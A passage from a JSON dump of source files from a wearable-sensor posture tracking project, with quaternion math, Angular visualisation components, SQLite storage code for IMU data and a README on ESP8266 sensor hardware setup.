q.w - r.z * q.x,\n z: r.w * q.z - r.x * q.y + r.y * q.x + r.z * q.w\n }\n}\n\nfunction getInverseQuaternion (quat) {\n // ref: https://www.mathworks.com/help/aeroblks/quaternioninverse.html?s_tid=gn_loc_drop\n const denominator = quat.w * quat.w + quat.x * quat.x + quat.y * quat.y + quat.z * quat.z\n return {\n w: quat.w / denominator,\n x: -quat.x / denominator,\n y: -quat.y / denominator,\n z: -quat.z / denominator\n }\n}\n\nconst torsoZRotate = {\n w: 0.707,\n x: 0,\n y: 0,\n z: 0.707\n}\n\nfunction torsoCalibrate (quat) {\n var offsetTorso = getQuaternionProduct(quat, torsoZRotate)\n var euler = new THREE.Euler().setFromQuaternion(offsetTorso, config.EULER_ORDER)\n euler.x = 0\n euler.z = 0\n var expectedTorsoQuat = new THREE.Quaternion().setFromEuler(euler)\n var newTorsoOffset = q12q2(quat, expectedTorsoQuat)\n console.log(`newTorsoOffset ${JSON.stringify(newTorsoOffset, null, 2)}`)\n // console.log(`torso: ${JSON.stringify(quat, null, 2)}\n // ${JSON.stringify(offsetTorso, null, 2)}\n // yaw: ${euler._y * 180 / Math.PI} pitch: ${euler._z * 180 / Math.PI} roll: ${euler._x * 180 / Math.PI}\n // `)\n}\n\nfunction q12q2 (q1, q2) {\n return getQuaternionProduct(getInverseQuaternion(q1), q2)\n}\n\nfunction deg2rad (deg) {\n return deg * Math.PI / 180\n}\n\nfunction rad2Bucket (rad) {\n var ans = Math.floor(rad / deg2rad(config.ANSWER_INTERVAL)) * config.ANSWER_INTERVAL\n return ans === 180 ? 180 - config.ANSWER_INTERVAL : ans\n}\n\n// module.exports = {\n// updateRealtimeVis: updateRealtimeVis\n// }\n"
},
{
"alpha_fraction": 0.6967871189117432,
"alphanum_fraction": 0.6967871189117432,
"avg_line_length": 28.294116973876953,
"blob_id": "ee37efc87071be62c9c50dd5e0aeb11526c688b1",
"content_id": "acd3c54bb14edd0bd76398b5efe474462ba7950f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "TypeScript",
"length_bytes": 498,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 17,
"path": "/oriTrakHAR-master/robotVisualizationRealtime/src/app/app.component.ts",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "import { Component } from '@angular/core';\nimport { SockService } from './services/sock.service';\nimport { DataModelService } from './services/data-model.service';\n\n@Component({\n selector: 'app-root',\n templateUrl: './app.component.html',\n styleUrls: ['./app.component.css']\n})\nexport class AppComponent {\n status\n axisNames\n constructor(private dataModel: DataModelService, private sock: SockService) {\n this.status = dataModel.status;\n this.axisNames = ['north', 'Up', 'East'];\n }\n}\n"
},
{
"alpha_fraction": 0.6067595481872559,
"alphanum_fraction": 0.6178119778633118,
"avg_line_length": 31.347150802612305,
"blob_id": "556e600376cb6c0e0e8e6b1e65519af54b4ed62b",
"content_id": "33d1ed58788908c25aca6037b853aaf9ce95b92e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 6243,
"license_type": "no_license",
"max_line_length": 227,
"num_lines": 193,
"path": "/oriTrakHAR-master/sensorDataCollection/dataServer_streamming/prev_db_service/db_service_old.js",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "'use strict'\nconst sqlite3 = require('sqlite3').verbose()\nconst Promise = require('bluebird')\nconst db = new sqlite3.Database('./userActivityData.db')\n\nfunction runQueryGen (db) {\n return function runQuery (sql, params) {\n return new Promise((resolve, reject) => {\n db.run(sql, params || [], (err) => {\n if (err) {\n reject(err)\n } else {\n resolve(true)\n }\n })\n sql = null\n params = null\n })\n .catch(e => {\n console.log(e)\n })\n }\n}\n\nfunction allQueryGen (db) {\n return function runQuery (sql, params) {\n return new Promise((resolve, reject) => {\n db.all(sql, params || [], (err, res) => {\n if (err) {\n reject(err)\n } else {\n resolve(res)\n }\n })\n sql = null\n params = null\n })\n .catch(e => {\n console.log(e)\n })\n }\n}\n\ndb.runQuery = runQueryGen(db)\ndb.allQuery = allQueryGen(db)\n\nvar dbPromise = db.runQuery(`\n CREATE TABLE IF NOT EXISTS SensorData100Hz(\n id INTEGER PRIMARY KEY,\n server_id INTEGER NOT NULL,\n sensor_id INTEGER NOT NULL,\n sensor_timestamp INTEGER NOT NULL,\n server_timestamp INTEGER NOT NULL,\n quat_w REAL NOT NULL,\n quat_x REAL NOT NULL,\n quat_y REAL NOT NULL,\n quat_z REAL NOT NULL,\n gyro_x REAL NOT NULL,\n gyro_y REAL NOT NULL,\n gyro_z REAL NOT NULL,\n lacc_x REAL NOT NULL,\n lacc_y REAL NOT NULL,\n lacc_z REAL NOT NULL,\n acc_x REAL NOT NULL,\n acc_y REAL NOT NULL,\n acc_z REAL NOT NULL\n );`)\n.then(res => {\n return db.runQuery(`\n CREATE TABLE IF NOT EXISTS SensorData20Hz(\n id INTEGER PRIMARY KEY,\n server_id INTEGER NOT NULL,\n sensor_id INTEGER NOT NULL,\n sensor_timestamp INTEGER NOT NULL,\n server_timestamp INTEGER NOT NULL,\n mag_x REAL NOT NULL,\n mag_y REAL NOT NULL,\n mag_z REAL NOT NULL\n );`)\n})\n.then(res => {\n return db.runQuery(`\n CREATE TABLE IF NOT EXISTS SensorData1Hz(\n id INTEGER PRIMARY KEY,\n server_id INTEGER NOT NULL,\n sensor_id INTEGER NOT NULL,\n sensor_timestamp INTEGER NOT NULL,\n server_timestamp INTEGER NOT NULL,\n temp INTEGER NOT NULL\n );`)\n})\n\n.then(res => {\n return db.runQuery(`\n CREATE TABLE IF NOT EXISTS SensorFreq(\n id INTEGER PRIMARY KEY,\n server_id INTEGER NOT NULL,\n sensor_id INTEGER NOT NULL,\n server_timestamp INTEGER NOT NULL,\n frequency INTEGER NOT NULL\n );`)\n})\n\n.then(res => {\n return db.runQuery(`\n CREATE INDEX IF NOT EXISTS sensor_timestamp_100 on SensorData100Hz(sensor_timestamp);`)\n})\n.then(res => {\n return db.runQuery(`\n CREATE INDEX IF NOT EXISTS server_timestamp_100 on SensorData100Hz(server_timestamp);`)\n})\n.then(res => {\n return db.runQuery(`\n CREATE INDEX IF NOT EXISTS sensor_timestamp_20 on SensorData20Hz(sensor_timestamp);`)\n})\n.then(res => {\n return db.runQuery(`\n CREATE INDEX IF NOT EXISTS SensorFreq_server_timestamp on SensorFreq(server_timestamp);`)\n})\n.then(res => {\n return db.runQuery(`\n CREATE INDEX IF NOT EXISTS server_timestamp_20 on SensorData20Hz(server_timestamp);`)\n})\n.then(res => {\n return db.runQuery(`\n CREATE INDEX IF NOT EXISTS sensor_timestamp_1 on SensorData1Hz(sensor_timestamp);`)\n})\n.then(res => {\n return db.runQuery(`\n CREATE INDEX IF NOT EXISTS server_timestamp_1 on SensorData1Hz(server_timestamp);`)\n})\n.then(res => {\n return db.runQuery(`\n CREATE INDEX IF NOT EXISTS id_100 on SensorData100Hz(sensor_id, server_id);`)\n})\n.then(res => {\n return db.runQuery(`\n CREATE INDEX IF NOT EXISTS id_20 on SensorData20Hz(sensor_id, server_id);`)\n})\n.then(res => {\n return db.runQuery(`\n CREATE INDEX IF NOT EXISTS id_1 on SensorData1Hz(sensor_id, server_id);`)\n})\n.then(res => {\n return db.runQuery(`\n CREATE INDEX IF NOT EXISTS SensorFreq_id on SensorFreq(sensor_id, server_id);`)\n})\n\nfunction insertSensorData100Hz (serverId, sensorId, sensorTimestamp, serverTimestamp, data) {\n dbPromise = dbPromise.then(res => {\n // console.log(data)\n var promise = db.runQuery(`INSERT INTO SensorData100Hz(server_id, sensor_id, sensor_timestamp, server_timestamp, quat_w, quat_x, quat_y, quat_z, gyro_x, gyro_y, gyro_z, lacc_x, lacc_y, lacc_z, acc_x, acc_y, acc_z)\n VALUES(?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)`,\n [serverId, sensorId, sensorTimestamp, serverTimestamp, data.quat.w, data.quat.x, data.quat.y, data.quat.z, data.gyro.x, data.gyro.y, data.gyro.z, data.lacc.x, data.lacc.y, data.lacc.z, data.acc.x, data.acc.y, data.acc.z])\n data = null\n return promise\n })\n}\n\nfunction insertSensorData20Hz (serverId, sensorId, sensorTimestamp, serverTimestamp, data) {\n dbPromise = dbPromise.then(res => {\n var promise = db.runQuery(`INSERT INTO SensorData20Hz(server_id, sensor_id, sensor_timestamp, server_timestamp, mag_x, mag_y, mag_z)\n VALUES(?, ?, ?, ?, ?, ?, ?)`,\n [serverId, sensorId, sensorTimestamp, serverTimestamp, data.mag.x, data.mag.y, data.mag.z])\n data = null\n return promise\n })\n}\n\nfunction insertSensorData1Hz (serverId, sensorId, sensorTimestamp, serverTimestamp, data) {\n dbPromise = dbPromise.then(res => {\n var promise = db.runQuery(`INSERT INTO SensorData1Hz(server_id, sensor_id, sensor_timestamp, server_timestamp, temp)\n VALUES(?, ?, ?, ?, ?)`,\n [serverId, sensorId, sensorTimestamp, serverTimestamp, data.temp])\n data = null\n return promise\n })\n}\nfunction insertHealth (serverId, sensorId, serverTimestamp, freq) {\n dbPromise = dbPromise.then(res => {\n var promise = db.runQuery(`INSERT INTO SensorFreq(server_id, sensor_id, server_timestamp, frequency)\n VALUES(?, ?, ?, ?)`,\n [serverId, sensorId, serverTimestamp, freq])\n freq = null\n return promise\n })\n}\nmodule.exports = {\n insertSensorData100Hz: insertSensorData100Hz,\n insertSensorData20Hz: insertSensorData20Hz,\n insertSensorData1Hz: insertSensorData1Hz,\n insertHealth: insertHealth\n}\n"
},
{
"alpha_fraction": 0.5508772134780884,
"alphanum_fraction": 0.680701732635498,
"avg_line_length": 55.599998474121094,
"blob_id": "b1a319848d5fb03ebf8ac014bc3dc71ede956377",
"content_id": "3083036f8edf26f6388468a91eb71d083fdd914b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "TypeScript",
"length_bytes": 285,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 5,
"path": "/oriTrakHAR-master/rawDataVis/src/app/serverAddr.ts",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "// echo 65536 | sudo tee -a /proc/sys/fs/inotify/max_user_watches\n// export const wsAddr = 'http://yuhui-desktop.duckdns.org:8080';\nexport const wsAddr = 'http://localhost:8088';\n// export const wsAddr = 'http://192.168.0.9:8080';\n// export const wsAddr = 'http://192.168.2.1:8088';\n\n\n"
},
{
"alpha_fraction": 0.6551724076271057,
"alphanum_fraction": 0.6934865713119507,
"avg_line_length": 19.076923370361328,
"blob_id": "5aa1ff2511fd73d86549056cc03b806a23ca546d",
"content_id": "0ff081939e0b892ffd048e3b55742dab99a34195",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 261,
"license_type": "no_license",
"max_line_length": 43,
"num_lines": 13,
"path": "/oriTrakHAR-master/sensorDataCollection/sensorSimulator/virtualReciever.js",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "var net = require('net')\n\nvar server = net.createServer()\n\nfunction processData (data) {\n console.log(data)\n}\nserver.on('connection', client => {\n console.log(client.server._connectionKey)\n client.on('data', processData)\n})\n\nserver.listen(9000, '127.0.0.1')\n"
},
{
"alpha_fraction": 0.5890074968338013,
"alphanum_fraction": 0.6148297786712646,
"avg_line_length": 38.611427307128906,
"blob_id": "840da00cf9d0152929292171645b959dad74635d",
"content_id": "aee63d59ee07a63c7e9f4e3faa7cee0c2e6f33a6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "TypeScript",
"length_bytes": 6932,
"license_type": "no_license",
"max_line_length": 112,
"num_lines": 175,
"path": "/oriTrakHAR-master/rawDataVis/src/app/components/bottom-time-line/bottom-time-line.component.ts",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "import { Component, OnInit, ViewChild} from '@angular/core';\nimport { SockService } from '../../services/sock.service';\nimport { DataModelService } from '../../services/data-model.service';\nimport { Observable } from 'rxjs/Observable';\nimport { NouiFormatter } from 'ng2-nouislider';\n\nexport class TimeFormatterHHMMSS implements NouiFormatter {\n to(value: number): string {\n return new Date(value).toString().slice(15, 25);\n };\n\n from(value: string): number {\n return 0;\n }\n}\n\nexport class TimeFormatterHHMM implements NouiFormatter {\n to(value: number): string {\n return new Date(value).toString().slice(15, 21);\n };\n\n from(value: string): number {\n return 0;\n }\n}\n\n\n@Component({\n selector: 'app-bottom-time-line',\n templateUrl: './bottom-time-line.component.html',\n styleUrls: ['./bottom-time-line.component.css']\n})\nexport class BottomTimeLineComponent implements OnInit {\n @ViewChild('nouislider') nouislider: any;\n private MAX_WINDOW_SIZE = 3600000;\n private MIN_WINDOW_SIZE = 30000;\n public status = this.dataModel.status;\n public formatter_hhmmss = new TimeFormatterHHMMSS()\n public formatter_hhmm = new TimeFormatterHHMM()\n public minTime = 0;\n public maxTime = 5;\n\n public config = {\n connect: [false, true, true, true, false],\n start: [1, 2, 3, 4],\n step: 1000,\n tooltips: [this.formatter_hhmmss, this.formatter_hhmmss, this.formatter_hhmmss, this.formatter_hhmmss],\n animationDuration: 5,\n pips: {\n mode: 'values',\n values: [],\n format: this.formatter_hhmm,\n }\n };\n // public status.start_selected_end = [1, 2, 3, 5];\n\n private previousEvent = [];\n public histUpdateTimeout;\n\n\n newDateSelectedObservable: Observable<any> = this.dataModel.getNewDateSelectedSubscribable();\n constructor(private dataModel: DataModelService, private sock: SockService) {\n\n }\n\n ngOnInit() {\n this.newDateSelectedObservable.subscribe(handleNewDateSelected.bind(this));\n function handleNewDateSelected(msg) {\n // console.log(`${JSON.stringify(this.config)} msg: ${JSON.stringify(msg)}`)\n this.minTime = msg.min;\n this.maxTime = msg.max;\n var startingDate = new Date(this.minTime)\n startingDate.setMinutes(0);\n startingDate.setMilliseconds(0);\n var startT = startingDate.valueOf();\n var endingDate = new Date(this.maxTime);\n endingDate.setHours(endingDate.getHours() + 1)\n endingDate.setMinutes(0);\n endingDate.setMilliseconds(0);\n var endT = endingDate.valueOf();\n var valueList = []\n for (var i = startT; i < endT; i = i + 1800000) {\n valueList.push(i)\n }\n valueList = valueList.filter(d => (d >= this.minTime) && (d <= this.maxTime))\n if (valueList[0] - this.minTime > 300000) {\n valueList = [this.minTime].concat(valueList)\n }\n if (this.maxTime - valueList[valueList.length - 1] > 300000) {\n valueList.push(this.maxTime)\n }\n this.config.pips.values = valueList\n\n if (this.nouislider) {\n this.nouislider.slider.updateOptions({range: {min: msg.min, max: msg.max}});\n this.nouislider.slider.updateOptions(this.config);\n } else {\n this.onChange([msg.min, msg.min + 300000, msg.min + 1200000, msg.max])\n }\n this.status.start_selected_end = [msg.min, msg.min + 300000, msg.min + 1200000, msg.max];\n }\n }\n\n public onChange(event) {\n this.dataModel.status.selectedTimeStart = new Date(event[0]);\n this.dataModel.status.selectedTimeEnd = new Date(event[3]);\n this.dataModel.status.animationStartTime = new Date(event[1]);\n this.dataModel.status.histStartTime = new Date(event[1]);\n this.dataModel.status.animationEndTime = new Date(event[2]);\n this.dataModel.status.histEndTime = new Date(event[2]);\n if (this.histUpdateTimeout) {\n clearTimeout(this.histUpdateTimeout)\n this.histUpdateTimeout = false\n }\n this.histUpdateTimeout = setTimeout((() => {\n // Auto change window logic\n if (event[0] !== this.previousEvent[0]) {\n console.log('changed 0');\n } else if (event[3] !== this.previousEvent[3]) {\n\n } else {\n if (this.status.windowFixed) {\n if ((event[1] + this.status.windowWidth) > event[3]) {\n this.status.start_selected_end = [event[0], event[3] - this.status.windowWidth, event[3], event[3]];\n } else if ((event[2] - this.status.windowWidth) < event[0]) {\n this.status.start_selected_end = [event[0], event[0], event[0] + this.status.windowWidth, event[3]];\n } else if (event[1] !== this.previousEvent[1]) {\n // console.log('1 moved')\n this.status.start_selected_end = [event[0], event[1], event[1] + this.status.windowWidth, event[3]];\n } else if (event[2] !== this.previousEvent[2]) {\n // console.log('2 moved')\n this.status.start_selected_end = [event[0], event[2] - this.status.windowWidth, event[2], event[3]];\n }\n } else {\n if (event[1] !== this.previousEvent[1]) {\n // User moved interested_window_start\n // console.log('move 1')\n if ((event[2] - event[1]) < this.MIN_WINDOW_SIZE) {\n console.log('too small')\n this.status.start_selected_end = [event[0], event[1], event[1] + this.MIN_WINDOW_SIZE, event[3]]\n if (this.status.start_selected_end[2] > this.status.start_selected_end[3]) {\n this.status.start_selected_end = [event[0], event[1], event[3], event[3]]\n }\n } else if ((event[2] - event[1]) > this.MAX_WINDOW_SIZE) {\n this.status.start_selected_end = [event[0], event[1], event[1] + this.MAX_WINDOW_SIZE, event[3]]\n }\n } else if (event[2] !== this.previousEvent[2]) {\n // console.log('move 2')\n // User moved interested_window_end\n if ((event[2] - event[1]) > this.MAX_WINDOW_SIZE) {\n this.status.start_selected_end[1] = event[2] - this.MAX_WINDOW_SIZE;\n this.status.start_selected_end = [event[0], event[2] - this.MAX_WINDOW_SIZE, event[2], event[3]]\n // console.log(this.status.start_selected_end)\n } else if ((event[2] - event[1]) < this.MIN_WINDOW_SIZE) {\n this.status.start_selected_end = [event[0], event[2] - this.MIN_WINDOW_SIZE, event[2], event[3]]\n\n }\n }\n\n if (event[1] === event[2]) {\n this.status.start_selected_end = [event[0], event[1], event[1] + this.MIN_WINDOW_SIZE, event[3]]\n if (this.status.start_selected_end[2] > this.status.start_selected_end[3]) {\n this.status.start_selected_end = [event[0], event[1], event[3], event[3]]\n }\n }\n }\n this.sock.updateHist();\n }\n this.dataModel.updateDisplayClusterData();\n this.previousEvent = JSON.parse(JSON.stringify(event));\n }).bind(this, event), 80);\n }\n\n\n}\n"
},
{
"alpha_fraction": 0.7404543161392212,
"alphanum_fraction": 0.7680038809776306,
"avg_line_length": 71.5614013671875,
"blob_id": "76eb58079d31dd15157c23ff150fbf61a15ea34d",
"content_id": "41762fd30d805728e6e1712774145d5ebf6441fe",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 4138,
"license_type": "no_license",
"max_line_length": 693,
"num_lines": 57,
"path": "/oriTrakHAR-master/sensorDataCollection/README.md",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "# oriTrakHAR Sensor Data Collection\nThis folder is for the sensor data collection part of the oritrak based human activity recognition project. It contains information about sensor hardware setup, embeded code for collecting data, and server side code to record the data.\n\n## System Overview\nEach sensor module consists of an [esp8266 nodeMCU D1 Mini V2 wifi chip](https://www.amazon.com/Makerfocus-ESP8266-Wireless-Development-Compatible/dp/B01MU4XDNX/ref=sr_1_50_sspa?s=electronics&ie=UTF8&qid=1516376792&sr=1-50-spons&keywords=D1+Mini+NodeMcu&psc=1), a [Bno-055 absolute orientation sensor](https://www.adafruit.com/product/2472), and a replacable 3.7v li-po battery. The esp8266 chip runs arduino code and connects to the Bno-055 chip via I2C. In action, a server device (rpi3 or an android phone) would setup a wifi soft access point. Each sensor module connects to the wifi access point and send sensor data via TCP sockets to the server device running the data recording script.\n\n-- TODO: add picture\n\n## Folder Structure\n```\n.\n+-- README.md\n+-- dataServer // node.js data collection code for raspberry pi 3 as the server device\n+-- espBno055 // arduino code for the sensor module\n+-- Adafruit_BNO055_modified.zip // modified bno-055 library to work with the sensor module. Changed defualt I2C pins to nodeMCU D1 Mini pins. Changed I2C bus speed to 400k.\n```\n\n## Raspberry Pi 3 as a Server Device Setup\nThe raspberry pi 3 serves 2 purposes. 1. Act as a wifi soft access point so that the sensor modules can connect to it and send information via TCP sockets. 2. Run data collection script(a node.js script) to record the data.\n\n### Raspberry Pi 3 as a Soft Access Point\nFollow [this tutorial](https://www.raspberrypi.org/documentation/configuration/wireless/access-point.md)\n\n### SSH\nFollow [this tutorial](https://www.raspberrypi.org/documentation/remote-access/ssh/)\n\n### Install node.js\nFollow [this guide](https://nodejs.org/en/download/package-manager/), install the latest LTS version\n\n### Run Data Collection Script\n```\n cd dataServer\n node ./dataServer\n```\n\n### TODO: set schipt to auto run at boot\n\n## Sensor Module Hardware Setup\nThe nodeMCU chip is connected to the Bno-055 chip via I2C. The I2C pins of boths chips are soldered together.\n-- TODO: add picture\n\nPinout of the nodeMCU chip:\n\nPinout of the Bno-055 chip:\n\nNote that the it is not neccessary to use the nodeMCU chip. Any esp8266 based chip should work. esp8266 chip does not have hardware I2C support. Since I2C is implemented in the software, user can define the SCL and SDA pin of the chip. The module we made are defined as shown in the picuture above.\n\n### Use Arduino with esp8266\nFollow [this tutorial](https://learn.adafruit.com/adafruit-huzzah-esp8266-breakout/using-arduino-ide) to setup your Arduino to use with esp8266 chip.\nCurrent code also supports over the air (OTA) firmeware update. Follow [this tutorial](https://randomnerdtutorials.com/esp8266-ota-updates-with-arduino-ide-over-the-air/) to see how to use OTA.\n\n### Sensor Calibration\nStart the server device and the data collection script first. Connect a sensor module with battery. The red led on the nodeMCU chip indicates power and the blue led indicates status. The power is first connected, you should see the blue led turns on. After the module is connected to an access point. The blue led will start blinking rapidly, indicating that the sensor is in calibration mode. Free style move the sensor for a few secounds, then hold still with the module facing up. You should see the blue led blinks less rapidly, indicating that it is sending the data.\n\n### Debugging using a laptop\nYou can use a laptop with wifi capability to debug the chip. To do that, you need to setup your laptop to run a wifi access point first. On Mac, if you also have ethernet cable connected, just open \"sharing\" and share the ethernet to wifi. If you don't have an ethernet connection, follow [this tutorial](http://www.laszlopusztai.net/2016/02/14/creating-a-wi-fi-access-point-on-os-x/) and share \"Loopback\" to wifi.\nUse `arp -a` to see connected devices\n\n\n"
},
{
"alpha_fraction": 0.6572472453117371,
"alphanum_fraction": 0.6823385953903198,
"avg_line_length": 46.18390655517578,
"blob_id": "d7b674615819de0d46221ab3cb916f8f12730dc6",
"content_id": "d9ab8d9cf6c5150afc43170d5b98d6fa26f65b16",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 4105,
"license_type": "no_license",
"max_line_length": 300,
"num_lines": 87,
"path": "/oriTrakHAR-master/sensorDataCollection/dataServer_streamming/prev_db_service/db_service_multirow_insert.js",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "'use strict'\nconst Promise = require('bluebird')\nconst db = require('sqlite')\nconst fs = require('fs')\nconst UPDATE_INTERVAL = 1000\nconst dbInit = fs.readFileSync('./dbInit.sql').toString()\nvar dbPromise = db.open('./userActivityData.db', {Promise})\ndbPromise = dbPromise.then(() => db.exec(dbInit))\n\nconst insertSensorData100HzQuery = 'INSERT INTO SensorData100Hz(server_id, sensor_id, sensor_timestamp, server_timestamp, quat_w, quat_x, quat_y, quat_z, gyro_x, gyro_y, gyro_z, lacc_x, lacc_y, lacc_z, acc_x, acc_y, acc_z) VALUES\\n'\nconst insertSensorData20HzQuery = 'INSERT INTO SensorData20Hz(server_id, sensor_id, sensor_timestamp, server_timestamp, mag_x, mag_y, mag_z) VALUES\\n'\nconst insertSensorData1HzQuery = 'INSERT INTO SensorData1Hz(server_id, sensor_id, sensor_timestamp, server_timestamp, temp) VALUES\\n'\nconst insertHealthQuery = 'INSERT INTO SensorFreq(server_id, sensor_id, server_timestamp, frequency) VALUES\\n'\nvar sensorData100HzBuf = ''\nvar sensorData20HzBuf = ''\nvar sensorData1HzBuf = ''\nvar healthBuff = ''\n\nfunction insertSensorData100Hz (serverId, sensorId, sensorTimestamp, serverTimestamp, data) {\n if (sensorData100HzBuf.length === 0) {\n sensorData100HzBuf = [sensorData100HzBuf, '(', [serverId, sensorId, sensorTimestamp, serverTimestamp, data.quat.w, data.quat.x, data.quat.y, data.quat.z, data.gyro.x, data.gyro.y, data.gyro.z, data.lacc.x, data.lacc.y, data.lacc.z, data.acc.x, data.acc.y, data.acc.z].join(', '), ')'].join('')\n } else {\n sensorData100HzBuf = [sensorData100HzBuf, ',\\n(', [serverId, sensorId, sensorTimestamp, serverTimestamp, data.quat.w, data.quat.x, data.quat.y, data.quat.z, data.gyro.x, data.gyro.y, data.gyro.z, data.lacc.x, data.lacc.y, data.lacc.z, data.acc.x, data.acc.y, data.acc.z].join(', '), ')'].join('')\n }\n}\n\nfunction insertSensorData20Hz (serverId, sensorId, sensorTimestamp, serverTimestamp, data) {\n if (sensorData20HzBuf.length === 0) {\n sensorData20HzBuf = [sensorData20HzBuf, '(', [serverId, sensorId, sensorTimestamp, serverTimestamp, data.mag.x, data.mag.y, data.mag.z].join(', '), ')'].join('')\n } else {\n sensorData20HzBuf = [sensorData20HzBuf, ',\\n(', [serverId, sensorId, sensorTimestamp, serverTimestamp, data.mag.x, data.mag.y, data.mag.z].join(', '), ')'].join('')\n }\n}\n\nfunction insertSensorData1Hz (serverId, sensorId, sensorTimestamp, serverTimestamp, data) {\n if (sensorData1HzBuf.length === 0) {\n sensorData1HzBuf = [sensorData1HzBuf, '(', [serverId, sensorId, sensorTimestamp, serverTimestamp, data.temp].join(', '), ')'].join('')\n } else {\n sensorData1HzBuf = [sensorData1HzBuf, ',\\n(', [serverId, sensorId, sensorTimestamp, serverTimestamp, data.temp].join(', '), ')'].join('')\n }\n}\nfunction insertHealth (serverId, sensorId, serverTimestamp, freq) {\n if (healthBuff.length === 0) {\n healthBuff = [healthBuff, '(', [serverId, sensorId, serverTimestamp, freq].join(', '), ')'].join('')\n } else {\n healthBuff = [healthBuff, ',\\n(', [serverId, sensorId, serverTimestamp, freq].join(', '), ')'].join('')\n }\n}\n\nsetInterval(() => {\n var query = ''\n if (sensorData100HzBuf.length > 0) {\n query = [query, insertSensorData100HzQuery, sensorData100HzBuf, ';\\n'].join('')\n }\n if (sensorData20HzBuf.length > 0) {\n query = [query, insertSensorData20HzQuery, sensorData20HzBuf, ';\\n'].join('')\n }\n if (sensorData1HzBuf.length > 0) {\n query = [query, insertSensorData1HzQuery, sensorData1HzBuf, ';\\n'].join('')\n }\n if (healthBuff.length > 0) {\n query = [query, insertHealthQuery, healthBuff, ';\\n'].join('')\n }\n // console.log(query)\n if (query.length > 0) {\n // console.log('--------------------------')\n // console.log(query)\n dbPromise = dbPromise.then(() => {\n db.exec(query)\n query = null\n })\n .catch(e => {\n console.log(e)\n })\n }\n sensorData100HzBuf = ''\n sensorData20HzBuf = ''\n sensorData1HzBuf = ''\n healthBuff = ''\n}, UPDATE_INTERVAL)\n\nmodule.exports = {\n insertSensorData100Hz: insertSensorData100Hz,\n insertSensorData20Hz: insertSensorData20Hz,\n insertSensorData1Hz: insertSensorData1Hz,\n insertHealth: insertHealth\n}\n"
},
{
"alpha_fraction": 0.6600768566131592,
"alphanum_fraction": 0.6694124341011047,
"avg_line_length": 23.945205688476562,
"blob_id": "72b9bf358010d495cb5fbb041eac36fb4bdfdccf",
"content_id": "8a90b8f9cdda307a752ffd0cd6bca63adf244e70",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "TypeScript",
"length_bytes": 1821,
"license_type": "no_license",
"max_line_length": 147,
"num_lines": 73,
"path": "/oriTrakHAR-master/rawDataVis/src/app/components/left-3d-vis/left-3d-vis.component.ts",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "import { Component, OnInit } from '@angular/core';\nimport { SockService } from '../../services/sock.service';\nimport { DataModelService } from '../../services/data-model.service';\nimport { Observable } from 'rxjs/Observable';\n@Component({\n selector: 'app-left-3d-vis',\n templateUrl: './left-3d-vis.component.html',\n styleUrls: ['./left-3d-vis.component.css']\n})\nexport class Left3dVisComponent implements OnInit {\n public status;\n public reconstruction_ratio = 0.5;\n public axisNames = ['north', 'up', 'East'];\n public histAxisNames = ['Front', 'up', 'Right'];\n public selectedRatio = 1;\n\n public histStartTime: Date;\n public histEndTime: Date;\n public availableRatio = [1, 2, 4, 8, 16];\n constructor(private dataModel: DataModelService, private sock: SockService) {\n this.status = dataModel.status;\n\n }\n\n ngOnInit() {\n\n }\n\n public objToArray(obj) {\n return Object.keys(obj);\n }\n public play() {\n this.status.playing = true;\n this.sock.play(this.status.animationStartTime.valueOf(), this.status.animationEndTime.valueOf(), this.selectedRatio, this.status.selectedDate);\n }\n public stop() {\n this.status.playing = false;\n this.sock.stop();\n }\n\n public selectRatio(ratio) {\n this.selectedRatio = ratio;\n }\n\n public selectHistSource(histSource) {\n this.status.selectedHistSource = histSource;\n this.updateHist();\n }\n\n public getPlayingTime() {\n if (this.status.playingTime) {\n return this.status.playingTime.toString().slice(15, 25);\n }\n }\n\n public updateHist() {\n this.sock.updateHist();\n }\n\n public pause() {\n this.sock.pause();\n this.status.playing = false;\n }\n\n public getAxisNameForHist() {\n if (this.status.selectedHistSource === 'Torso Orient') {\n return this.axisNames;\n } else {\n return this.histAxisNames;\n }\n }\n\n}\n"
},
{
"alpha_fraction": 0.5164399147033691,
"alphanum_fraction": 0.6643990874290466,
"avg_line_length": 30.5,
"blob_id": "aad3be3362f07f5f059e9701cc1544bcd27026e4",
"content_id": "b4ac78e172eb267792b97474b39eb20238c83ccb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1764,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 56,
"path": "/oriTrakHAR-master/sensorDataCollection/sensorSimulator/sensorSimulator.js",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
